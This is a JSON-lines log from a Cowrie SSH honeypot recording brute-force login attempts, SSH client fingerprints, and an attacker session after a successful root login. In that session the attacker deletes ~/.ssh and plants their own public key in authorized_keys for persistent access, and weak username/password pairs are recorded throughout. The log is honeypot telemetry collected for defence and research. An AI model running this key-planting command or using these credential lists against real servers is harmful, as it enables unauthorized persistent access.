{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:42:34.844414Z","src_ip":"49.247.35.31","session":"fb47e18d5993"}
{"eventid":"cowrie.login.success","username":"root","password":"Qazwsxedcrfv","message":"login attempt [root/Qazwsxedcrfv] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:42:36.001213Z","src_ip":"49.247.35.31","session":"fb47e18d5993"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:42:36.593222Z","src_ip":"49.247.35.31","session":"fb47e18d5993"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:42:36.593983Z","src_ip":"49.247.35.31","session":"fb47e18d5993"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:42:36.594768Z","src_ip":"49.247.35.31","session":"fb47e18d5993"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:42:36.880470Z","src_ip":"49.247.35.31","session":"fb47e18d5993"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:42:37.569844Z","src_ip":"49.247.35.31","session":"fb47e18d5993"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:42:37.570593Z","src_ip":"49.247.35.31","session":"fb47e18d5993"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:42:37.865362Z","src_ip":"49.247.35.31","session":"fb47e18d5993"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:42:37.866178Z","src_ip":"49.247.35.31","session":"fb47e18d5993"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":37597,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f4a3762ff41","protocol":"ssh","message":"New connection: 49.247.35.31:37597 (1.2.3.4:22) [session: 3f4a3762ff41]","sensor":"my-vps","timestamp":"2025-09-08T13:42:38.154154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:42:38.160092Z","src_ip":"49.247.35.31","session":"3f4a3762ff41"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:42:38.455310Z","src_ip":"49.247.35.31","session":"3f4a3762ff41"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:42:39.604194Z","src_ip":"49.247.35.31","session":"3f4a3762ff41"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:42:40.898913Z","src_ip":"49.247.35.31","session":"3f4a3762ff41"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":1340,"dst_ip":"1.2.3.4","dst_port":22,"session":"b034054eab6a","protocol":"ssh","message":"New connection: 49.247.35.31:1340 (1.2.3.4:22) [session: b034054eab6a]","sensor":"my-vps","timestamp":"2025-09-08T13:42:41.194480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:42:41.195956Z","src_ip":"49.247.35.31","session":"b034054eab6a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:42:41.495187Z","src_ip":"49.247.35.31","session":"b034054eab6a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:42:42.703442Z","src_ip":"49.247.35.31","session":"b034054eab6a"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:42:43.002312Z","src_ip":"49.247.35.31","session":"fb47e18d5993"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:42:43.003530Z","src_ip":"49.247.35.31","session":"b034054eab6a"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":37652,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3c4e9803daa","protocol":"ssh","message":"New connection: 134.199.174.250:37652 (1.2.3.4:22) [session: f3c4e9803daa]","sensor":"my-vps","timestamp":"2025-09-08T13:42:52.098152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:42:52.098917Z","src_ip":"134.199.174.250","session":"f3c4e9803daa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:42:52.389779Z","src_ip":"134.199.174.250","session":"f3c4e9803daa"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"1q2w3e4r","message":"login attempt [mysql/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T13:42:53.563478Z","src_ip":"134.199.174.250","session":"f3c4e9803daa"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:42:54.875026Z","src_ip":"134.199.174.250","session":"f3c4e9803daa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36104,"dst_ip":"1.2.3.4","dst_port":22,"session":"7500dc51a4f1","protocol":"ssh","message":"New connection: 212.227.235.229:36104 (1.2.3.4:22) [session: 7500dc51a4f1]","sensor":"my-vps","timestamp":"2025-09-08T13:42:55.058795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:42:55.061161Z","src_ip":"212.227.235.229","session":"7500dc51a4f1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:42:55.164320Z","src_ip":"212.227.235.229","session":"7500dc51a4f1"}
{"eventid":"cowrie.login.failed","username":"builduser","password":"password1","message":"login attempt [builduser/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:42:55.583947Z","src_ip":"212.227.235.229","session":"7500dc51a4f1"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:42:56.736767Z","src_ip":"212.227.235.229","session":"7500dc51a4f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49548,"dst_ip":"1.2.3.4","dst_port":22,"session":"07331dac1829","protocol":"ssh","message":"New connection: 212.227.235.229:49548 (1.2.3.4:22) [session: 07331dac1829]","sensor":"my-vps","timestamp":"2025-09-08T13:43:06.490477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:43:06.491150Z","src_ip":"212.227.235.229","session":"07331dac1829"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:43:06.609560Z","src_ip":"212.227.235.229","session":"07331dac1829"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"111","message":"login attempt [deployer/111] failed","sensor":"my-vps","timestamp":"2025-09-08T13:43:07.116158Z","src_ip":"212.227.235.229","session":"07331dac1829"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:43:08.234251Z","src_ip":"212.227.235.229","session":"07331dac1829"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43266,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad0510334ba3","protocol":"ssh","message":"New connection: 212.227.235.229:43266 (1.2.3.4:22) [session: ad0510334ba3]","sensor":"my-vps","timestamp":"2025-09-08T13:43:19.471714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:43:19.472789Z","src_ip":"212.227.235.229","session":"ad0510334ba3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:43:20.376245Z","src_ip":"212.227.235.229","session":"ad0510334ba3"}
{"eventid":"cowrie.login.failed","username":"webguest","password":"123456","message":"login attempt [webguest/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T13:43:21.322882Z","src_ip":"212.227.235.229","session":"ad0510334ba3"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:43:22.552584Z","src_ip":"212.227.235.229","session":"ad0510334ba3"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":60288,"dst_ip":"1.2.3.4","dst_port":22,"session":"02b6bd2b3e76","protocol":"ssh","message":"New connection: 134.199.174.250:60288 (1.2.3.4:22) [session: 02b6bd2b3e76]","sensor":"my-vps","timestamp":"2025-09-08T13:43:23.318732Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:43:23.319736Z","src_ip":"134.199.174.250","session":"02b6bd2b3e76"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:43:23.586762Z","src_ip":"134.199.174.250","session":"02b6bd2b3e76"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"pass123","message":"login attempt [mysql/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:43:24.543623Z","src_ip":"134.199.174.250","session":"02b6bd2b3e76"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:43:25.829614Z","src_ip":"134.199.174.250","session":"02b6bd2b3e76"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":55412,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a1381a4ffc9","protocol":"ssh","message":"New connection: 134.199.174.250:55412 (1.2.3.4:22) [session: 2a1381a4ffc9]","sensor":"my-vps","timestamp":"2025-09-08T13:43:53.596860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:43:53.598815Z","src_ip":"134.199.174.250","session":"2a1381a4ffc9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:43:53.908566Z","src_ip":"134.199.174.250","session":"2a1381a4ffc9"}
